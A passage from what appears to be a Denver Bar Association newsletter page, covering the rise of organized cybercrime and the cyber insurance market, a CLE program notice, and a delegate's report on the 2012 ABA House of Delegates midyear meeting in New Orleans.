for cyber insurance coverage now existed.

The other change that occurred more gradually over time, but which has had a significant impact concerning the frequency and magnitude of data breaches, was organized crime. In the early 2000s, hacking was more of an exercise in annoyance or a used for bragging purposes. Hackers at that time wanted their exploits talked about and know. They wanted credit for hacking into or bringing down a sophisticated company (or better yet a division of the Federal Government or military). As such, when an attack happened it was discovered and remediated, and that would be the end of it.

True criminals, of course, are less interested in such notoriety. In fact, when trying to steal thousands/millions of records to commit identity theft or credit card fraud it is much better to NOT be detected. Lingering on a company’s network taking information for months or years is a much more profitable endeavor. Recognizing that this type of crime is low risk (it can be performed from thousands of miles away in Eastern Europe with almost no chance of getting caught) and high reward, organized crime flooded into the space. And in this context the word “organized” is truly appropriate – these enterprises retain very smart IT-oriented people that use every tool possible to scale and automate their crimes. They leverage the communication tools on the Internet to fence their “goods” creating, for example, wholesale and retail markets for credit cards, or “eBay”-like auction sites to hawk their illicit wares (e.g. valuable information). The change in orientation described above has essentially resulted in a 24/7/365 relentless crime machine constantly attacking and looking for new ways to attack, and always seeming to be one step ahead of those seeking to stop them. That is why we read about security and privacy breaches practically every day in the newspaper.

Fast-forward to present time. Cyber insurance is a much more established market with more carriers entering on a regular basis. There are primary and excess markets available for big risks, and companies of all sizes are looking at cyber more as a mandatory purchase rather than discretionary. As the world continues to change at seemingly light-speed and cyber risks increase (with the advent of hacktivism, social media and the consumerization of IT/BYOD ) the need for cyber is also growing. With competition pushing cyber insurance prices down, and significant security and privacy risk being retained by organizations, risk transfer is becoming very attractive (and from an overall big picture systemic point of view, spreading risk is also attractive). The price may be right, and the peace of mind priceless.

Click here to read the full article. Program registration information below.

CLE Program: Is Your Sensitive Data Secure? Cyber Insurance for Your Firm and Your Clients

This CLE presentation will take place on Thursday, March 29. Participants may attend live in our classroom or watch the live webcast.

If you can’t make the live program or webcast, the program will also be available as a homestudy in two formats: video on-demand and mp3 download.

Report from the ABA House of Delegates Meetings at the 2012 Midyear Meeting in New Orleans

I have the privilege of serving the Denver Bar Association as a delegate to the American Bar Association (“ABA”) House of Delegates.  The ABA House of Delegates met at the ABA’s midyear meeting held in New Orleans, Louisiana, on February 6, 2012.  This Article summarizes the House of Delegates events at the midyear meeting and the action taken by the House.

The Midyear Meeting was very well-attended.  It had the best reported attendance on record.  The ABA sponsored numerous programs on issues such as the Ethics 20/20 commission, the state court funding crisis, and efforts to improve access to justice.  There were many important issues addressed by the House of Delegates at the midyear meeting.  This Article summarizes a few of them.

Ethics 20/20 Commission’s White Papers and Proposals Relating to the Ethics of Litigation Financing, Non-Lawyer Ownership of Law Firms, Outsourcing, and the Use of Technology of Mobile Devices

Before the House of Delegates convened, the Ethics 20/20 Commission sent information around to the delegates regarding the work of the Commission and its proposals.  Specifically, the Commission informed the delegates of its plan to bifurcate its presentation of proposals to help facilitate the House of Delegates’ consideration of the Commission’s recommendations.  The decision to bifurcate the presentation of proposals foretells a concern that some of the Commission’s proposals will be controversial and will generate much discussion and debate.

Indeed, from the preview that the Commission has provided, some of the issues that the Commission will put before the House will generate much discussion.  The Commission has produced white papers that discuss many of the complex ethical issues that cannot effectively be addressed through changes to Model Rules.  Specifically, one of the Commission’s white papers discusses ethical issues involved with litigation financing, including issues regarding conflicts of interest, a lawyer’s duty of confidentiality, the attorney-client privilege, and rules regulating the exercise of the lawyer’s independent judgment.  The Commission’ white paper can be found by clicking here.

The Commission also is working on proposals relating to alternative business structures for law firms, outsourcing of legal services and confidentiality-related ethics issues arising from lawyers’ use of technology. Additionally, the Commission also is working on a model rule relating to lawyers’ obligations to retain client files.  An issues paper regarding alternative business structures for law firms – including non-lawyer ownership of law firms – has been distributed by the Commission.  It can be found by clicking here.

During the House of Delegates meeting, Former ABA President Carolyn B. Lamm addressed the House about the Commission’s progress.  President Lamm explained that numerous various roundtable sessions and meetings have been held around the country.  She explained that formal recommendations will be presented at the annual meeting in 2012 and at the midyear meeting in 2013.  President Lamm explained that one of the Commission’s more controversial issues is whether non-lawyers should be allowed under legal ethics rules to have a limited ownership interest in law firms in the United States.  This issue has been discussed extensively in Colorado previously.

President Lamm explained that the Commission is considering other issues relating to the need to balance the convenience and efficiencies inherent in a lawyer’s use of new technologies, while also preserving the lawyer-client relationship, confidentiality, competence and the values of the profession.  President Lamm explained that the Commission plans in presenting proposals on each of these issues for consideration by the House of Delegates.  All interested members of the Bar should get in touch with me or other Colorado delegates to discuss any concerns about any of the issues that are being considered by the Ethics 20/20 Commission, or the proposals that are likely coming from the Commission.

Summary of the House of Delegates

After the House of Delegates convened on February 6, 2012, the Delegates were greeted by Mitchell Landrieu, the Mayor of New Orleans, who also is a lawyer.  Mayor Landrieu talked about the challenges that the city has been through in recent years, with Hurricanes Katrina and Rita, and the BP oil spill.  Mayor Landrieu quipped that the city is “waiting for locusts now.”  Mayor Landrieu’s speech was interesting and insightful, explaining that New Orleans is truly resilient and has become the “a laboratory for innovation and change,” because of the disasters it has suffered.  Mayor Landrieu’s speech was an excellent way to kick-off the work of the House.

After the Mayor’s speech and some other introductory actions, the House got to work debating and voting on resolutions before the House.  The House adopted a number of important resolutions, including:

  • Resolution 101A, which adopted the black letter ABA Criminal Justice Standards on Law Enforcement Access to Third Party which provide a framework through which legislatures, courts acting in their supervisory capacity and administrative agencies can balance the needs of law enforcement and the interests of privacy, freedom of expression and social participation.
  • Resolution 101B, which urged governments at various levels to require laboratories producing reports for use in criminal trials to adopt pretrial discovery procedures requiring comprehensive and comprehensible laboratory and forensic science reports, and listed relevant factors to be included in such reports.
  • Resolution 101C, which urged trial judges who have decided to admit expert testimony to consider a number of factors in determining the manner in which that evidence should be presented to the jury, and also provided guidance about how to instruct the jury in its evaluation of expert scientific testimony in criminal and delinquency proceedings.
  • Resolution 101F, which supported legislation, policies and practices that allow equal and uniform access to therapeutic courts and problem-solving sentencing alternatives, such as drug treatment and anger management counseling, regardless of the custody or detention status of the individual.
  • Resolution 113, which called for adoption as ABA policy uniform standards for language access in courts.  The policy provides clear guidance to courts in designing, implementing, and enforcing a comprehensive system of language access services that is suited to the need in the communities they serve.
  • Resolution 102B, which approved the Uniform Electronic Legal Material Act promulgated by the National Conference of Commissioners on Uniform State Laws in 2011, as an appropriate Act for those states desiring to adopt the specific substantive law suggested therein.  The Uniform Act provides rules for the authentication and preservation of electronic legal material.
  • Resolution 108, which urged state and territorial bar admission authorities to adopt rules and procedures to accommodate the unique needs of military spouse attorneys who move frequently in support of the nation’s defenses.
  • Resolution 111, which urged entities that administer a law school admission test to provide appropriate accommodations for a test taker with a disability to best ensure the exam reflects what the test is designed to measure and not the test taker’s disability.
  • Resolution 302, which supported the principle that “private” lawyers representing governmental entities are entitled to claim the same qualified immunity provided “government” lawyers when they are acting “under color of state law.”  This issue is particularly important given that there is a pending case before the United States Supreme Court considering this question.  See Filarsky v. Delia, U.S. No. 10-1018, argued 1/17/2012.

A summary of the resolutions adopted by the House can be found by clicking here.  Additionally, I can provide a copy of the resolutions to any interested reader. Contact me if interested.

Statement from President Robinson

In addition to this important work, the House of Delegates heard from Bill Robinson, President of the ABA.  President Robinson explained that the most pressing issue facing the legal system today is under-funding of the courts, which is at a crisis level.  President Robinson urged all ABA members to consider the under-funding crisis to be a threat to our liberty and rule of law.  President Robinson explained the ABA’s efforts to combat this crisis, including its extensive education efforts and its efforts to increase public awareness about the crisis.  Additionally, the ABA has made the crisis the core of the law day events, which will focus on the theme: “No Courts, No Justice, No Freedom.”

Nomination of James Silkenat as President-Elect

Additionally, the nominating committee announced that James Silkenat of New York was nominated to be President-Elect Designee of the ABA.  The House of Delegates will vote on his nomination at the Annual Meeting in Chicago this August.  If elected, Mr. Silkenat will serve a one-year term as President beginning in August, 2013.  All members of the Bar are urged to give any input on Mr. Silkenat to me or any of the other Colorado delegates.

Other Matters

Finally, the House of Delegates also considered other matters.  Those other matters included a report from the ABA’s Executive Director, Jack Rives, and a report from the ABA’s treasurer.  The House also heard from Chief Judge Washington, who is the President of the Conference of Chief Justices.  Chief Judge Washington spoke about language access to the courts.  He also discussed the core focuses of the Conference, which are judicial independence and civics education.

Conclusion

I hope this Article sufficiently highlighted many of the more interesting or important the agenda items considered by the House of Delegates at the midyear meeting in New Orleans.  I appreciate all input that any members of the Denver Bar Association have regarding any of the issues that have been considered, or will be considered, by the ABA House of Delegates.

The American Bar Association is offering a free trial membership in the ABA and in a section of the ABA. Sign up here.

The Docket eFile brings features from your favorite Denver Bar Association publication to you digitally. When you see the logo, you’re reading an article from The Docket. You’ll also still be able to read the full issue online at denbar.org/docket.